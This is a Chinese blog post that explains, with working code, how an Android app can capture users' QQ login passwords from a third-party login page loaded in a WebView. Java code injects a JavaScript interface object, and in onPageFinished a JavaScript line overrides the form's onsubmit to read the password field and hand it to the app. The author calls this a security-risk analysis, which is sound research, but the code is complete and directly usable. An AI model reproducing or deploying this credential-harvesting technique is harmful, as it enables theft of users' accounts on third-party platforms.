`
dawuafang
  • 浏览: 1092186 次
文章分类
社区版块
存档分类
最新评论

WebView Attack In Android : 解析第三方账号登录平台所存在的安全隐患

 
阅读更多
转载请注明出处:http://blog.csdn.net/singwhatiwanna/article/details/17663345

前言

这是一个很有趣的话题,WebView在Android中包括IOS中都是一个很重要的控件,有了它,我们可以直接在应用里打开网页而不用跳到浏览器,且网页效果和浏览器几乎一样,这样会增强用户体验,当然也有缺点:占用内存太大,因为WebView加载网页所耗费的内存全部算在你的应用的堆里,如果不做特殊处理,你的应用就更容易OOM了。但是这不是我们今天所讨论的话题,我今天要介绍的是:如果利用WebView强大的特性来做一些有意义的事,比如违规存储第三方登录平台的账号信息(比如QQ登录平台、新浪微博等),为什么说是违规存储,因为第三方登录平台肯定不愿意将自己的账号信息给你,尤其是账户密码,因为这涉及到账户安全。当然,本次分析只讨论技术可行性,不讨论实际可行性,确切来说,完成这一切要有一个前提:你的应用接入了第三方登录平台(这个很常见)并且你有权利通过你的应用去收集账号信息(这个很难,但是你做个山寨应用是可以做到的)。另外,由于本文重点不是介绍如何使用WebView,所以基础知识请大家自行了解下。还有,博主写本文只是和大家分析技术,同时指出问题,并不是鼓励大家去搞破坏。

WebView重要的特性

  • WebView支持JavaScript,一般的应用为了获得正常的体验效果,往往还会设置WebViewClient(页面加载进度相关接口)和WebChromeClient(网页弹出对话框相关接口等),总之,通过合理的设置,一个WebView基本可以做到和浏览器访问页面一样的效果
  • WebView支持在Android代码中执行JavaScript语句:mWebView.loadUrl("javascript:" + mJsString)
  • WebView支持在JavaScript中执行Android语句(这个特性Google官方的解释是:使用的时候尤其要注意安全性):mWebView.addJavascriptInterface(new SavePasswordJavaScriptInterface(), "SPJSInterface")

好了,有了上面几个特性,我们就可以进入正题了

第三方账号登录平台所存在的安全隐患

这里以QQ账号接入平台为例,下面将会演示一个如何违规存储第三方账号信息的方法,由于除了Android还涉及到JavaScript、HTML等东西,所以具体的实现上可能会有细微差别(因为HTML和JavaScript会改变),但是思想是不变的。

下面是一段QQ接入平台的登录页面的HTML代码,我进行了删减,大体如下所示:

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="application/xhtml+xml; charset=UTF-8" />
<meta name="viewport" content="width=device-width; initial-scale=1.0; minimum-scale=1.0; maximum-scale=1.0"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge"/>
<meta content="telephone=no" name="format-detection">
<meta http-equiv="Expires" content="0"/>
<meta http-equiv="Pragma" content="no-cache"/>
<meta http-equiv="Cache-Control" content="no-cache,no-store,max-age=0,s-maxage=0,must-revalidate" />
    <title>帐号设置</title>
</head>
<body class="unilogin" style="height:100%">
    <div id="ptlogin-container">
        <h1 id="title">帐号设置</h1>
        <!--  普通登录 -->
        <!--注意:我们只要在这里执行我们的代码就可以了,因为登录的时候表单提交会执行onsubmit
        或者就算HTML不是这么写的,也没关系,我们的本意是当表单提交的时候能执行我们的代码就行了
        我们只要在Android中执行一段js,通过js给表单的onsubmit事件加入我们的代码,估计难不倒各位
        -->
        <form onsubmit="return false;">
            <fieldset id="loginBox" class="loginfiled" style="display:none">
                <p>
                    <lable class="input-title">帐 号</lable>

                        <input type="tel" id="ptlogin-name" placeholder="请输入QQ号"/>
                        <a class="empty" id="clearQQ" style="display:none;">清除</a>
                </p>
                <p>
                    <lable class="input-title">密 码</lable>
                    <input type="password" id="ptlogin-password" placeholder="请输入密码">
                    <a class="empty" id="clearPwd" style="display:none;">清除</a>
                </p>
            </fieldset>
            <div class="varify-wrapper clearfix" id="verify_box" style="display:none">
                <div class="show-varify fr clearfix">
                    <div class="img-varify fl">
                        <img id="verifyPic" src="http://3gimg.qq.com/wap30/img/netdisk/verification-code.png" width="110" height="38"></div>
                        <div class="fl"><a id="reVerify" href="#">换一张</a></div>
                    </div>
                <div class="fl"><input id="ptlogin-imgVerify" type="text" placeholder="输入验证码"></div>
            </div>
            <input id="isNeedSid" type="hidden" name="isNeedSid" value=1 />
                <input id="bid" type="hidden" name="bid" value=flashgame />
                <p><input id="ptlogin-submit" class="btn-login" type="submit" value="登 录" style="display:none"></p>
        </form>
    </div>
    <!--无法登录-->
    <div class="common-box box-sm" id="ptlogin-prompt-1" style="display: none">
        <h3 class="bd-bm-bk" id="login-errmsg">登录过于频繁,请稍后再试</h3>
        <div class="btn-md">
            <input id="ptlogin-relog-1" class="btn-dialog btn-cancel" type="reset" value="确定">
        </div>
    </div>
    <!--出错提示-->
    <div class="common-box box-error" id="ptlogin-prompt-2" style="display:none;">
        <h3 class="bd-bm-bk" id="login-errmsg">登录密码错误,请重新输入</h3>
        <div class="btn-md">
            <input id="forget-pwd-1" class="btn-dialog" type="button" value="忘记密码">
            <input id="ptlogin-relog-2" class="btn-dialog" type="reset" value="重新输入">
        </div>
    </div>
    <!--正在登录-->
    <div class="load-box" style="display:none;">
        <div class="load-circle"></div>
        <p>登录中...</p>
    </div>
</body>
</html>

实现思想:

首先向WebView注入Java对象,在WebView加载完毕的时候执行一段js,给表单提交事件关联上我们的代码,即让表单提交的时候执行所注入的Java对象的一个方法,js执行我们的方法的时候可以把qq号和密码作为参数传递过来,然后我们就可以保存了。下面的步骤只示范如何把qq密码存下来,不过,存qq号是一样的方法,多传递一个参数就行了。

实现步骤:

第一步:声明要注入的Java对象

public class SavePasswordJavaScriptInterface  
{  
	public void savePassword(final String password)
	{  
		Log.w("ATTACK", "enter spjsinterface:"+ password);

		mHandler.post(new Runnable()
		{  
			@Override  
			public void run()
			{
    			//这里就是用户登录的密码了,你可以存起来了
    			mPassword = password;
    			Log.w("ATTACK", mPassword);
			}  
		});  
	} 
}

第二步:注入上述对象

//这里是注入Java对象
mWebView.addJavascriptInterface(new SavePasswordJavaScriptInterface(), "SPJSInterface");
//这里是打开登录平台页面
mWebView.loadUrl(LOGIN_URL);

第三步:在WebViewClient中的onPageFinished方法中注入js,这样当登录的时候就会调用我们之前注入的Java对象,同时乖乖地把密码作为参数传过来

@Override
public void onPageFinished(WebView view, String url)
{
    super.onPageFinished(view, url);
	//仅当是登录url的时候才注入我们的js,不要任何url都注入
	if (url.equals(LOGIN_URL)) {
		//要注入的js
		String js = "document.forms[0].onsubmit=function(event){var pwd = document.getElementById(\"ptlogin-password\").value;window.SPJSInterface.savePassword(pwd);return false;}";
		Log.w("ATTACK", "inject js, js= " + js);
		view.loadUrl("javascript:" + js);
	}
}

总结一下

从上面三个步骤,我们就可以获取第三方接入平台的账号信息了。这里我再简述一下思想:首先注入java对象,当登录页面加载完成以后,再注入一段js,让登录表单在提交的时候能够执行我们之前注入的java对象的方法,然后就行了,等用户输入账号信息点击登录的时候,我们的方法就会被调用,而方法的参数就是账号信息。不同的接入平台注入对的js应该是不一样的,但是这个我相信绝对难不倒大家。不知道会不会有些朋友觉得不好理解,主要是因为用到了java和js的交互,涉及到html中表单的提交和js中的事件,这些知识是属于前端开发范畴的,所以我没有去详细地介绍它,感兴趣的小伙伴们可以自己了解下html和js。最后,新的一年里,祝大家新年快乐!
分享到:
评论

相关推荐

    android的webView的登录实例

    使用android studio 3.1.2 ,利用webview,实现登录界面。采用本地html 页面

    com.google.android.webview.apk

    有些平板缺失加载webview所依赖的内核apk的资源文件,会导致应用加载webview报错。需要自己安装webview的apk。 webview全称叫做Android System WebView,它是Android生态系统的重要组成部分,也是Chrome浏览器的...

    Android_WebView安全攻防指南2020.pdf

    为此,本次峰会上,何恩基于自身漏洞挖掘所积累的丰富案例,对WebView安全配置、白名单校验、Js2Java接口安全、Intent Scheme校验等典型漏洞案例进行了介绍和分析。通过本演讲,开发者能了解到Android WebView最新的...

    com.google.android.webview

    android system webview 适配系统&gt;=5.0

    android_webview

    android_webviewandroid_webviewandroid_webviewandroid_webviewandroid_webviewandroid_webviewandroid_webviewandroid_webviewandroid_webviewandroid_webviewandroid_webviewandroid_webviewandroid_webview...

    Android代码-Android-X5WebView基本封装

    Android-X5WebView基本封装和使用 通过OkHttp拦截器、自定义CookieJar有效完成客户端与H5端的Cookie同步管理 监听WebView的加载进度 滚动条的设置(隐藏或者显示,内侧显示还是外侧显示) 优化X5WebView的预加载问题...

    集成目前Android主流优秀第三方组件

    这是一个集成目前Android主流优秀第三方组件、优秀好用的自定义控件、实用工具类封装、以及一些APP共通模块(比如:版本更新、意见反馈、引导界面等等)的开发包,帮助程序员快速开发自己的APP 已集成第三方开源...

    android 第三方webview cordova的集成使用

    android 程序集成 cordova使用方法

    Android WebView 去除标题

    Android WebView 去除标题 利用javacript交互

    android原生登录 +webview 记住登录状态

    在进行APP+H5混合开发的时候...这种情况在Android开发中比较常见,因为Android不会自动同步cookie到WebView。做iOS开发则不用担心这个问题,因为iOS内部已经实现了cookie同步.本文就是一个小的事例,从登录到同步cookie

    Android解析XML使用WebView显示

    解析XMl,并用JSON在页面显示。资源共享,希望互相学习;注:在ubuntu上做的,在windows在可能会出现乱码!

    Android Studio平台下使用webview开发的android浏览器

    本资源配套本人的博客文章《Android开发】Android Studio中进行简单的WebView构建浏览器开发1》和《Android开发】Android Studio中进行简单的WebView构建浏览器开发2》进行使用,实现了基本的浏览器功能:包括:输入...

    Attacks on WebView in the Android System

    Attacks on WebView in the Android System

    android webview 版本69.0

    这是AOSP的webview,包名com.android.webview,不是google的webview

    Android通过Chrome Inspect调试WebView的H5 App离线.rar

    1.前端开发离不开Chrome的开发者工具,尤其是调试Android WebView时。然而,如果使用chrome://Inspect的方法,国内的开发者会惊奇地发现“空白啊”!为此,我发布过这个离线包的解决方案!可以无需FanQ就能调试了。 ...

    实例详解Android Webview拦截ajax请求

    Android Webview虽然提供了页面加载及资源请求的钩子,但是对于h5的ajax请求并没有提供干涉的接口,这意味着我们不能在webview中干涉javascript发起的http请求,而有时候我们确实需要能够截获ajax请求并实现一些功能...

    android WebView设置setBuiltInZoomControls(true)同时隐藏缩放按钮

    WebView设置setBuiltInZoomControls(true)后,隐藏缩放按钮的控件在webView的源码里是通过: private ZoomButtonsController mZoomButtonsController; 这个私有控件控制的,而且也没有public方法可以获得此...

    android webview 拨打电话

    android webview拨打电话 关注博客http://himici.com

    Android webview QQ一键登录并向后台返回参数

    。。。。。。。Android webview QQ一键登录并向后台返回参数

    Android实现WebView懒加载

    Android实现WebView懒加载,提前进行页面JS资源加载。减少WebView加载时间及加载资源问题。Android 8.0以前需要引入X5内核,Android 8.0以后无特殊要求。

Global site tag (gtag.js) - Google Analytics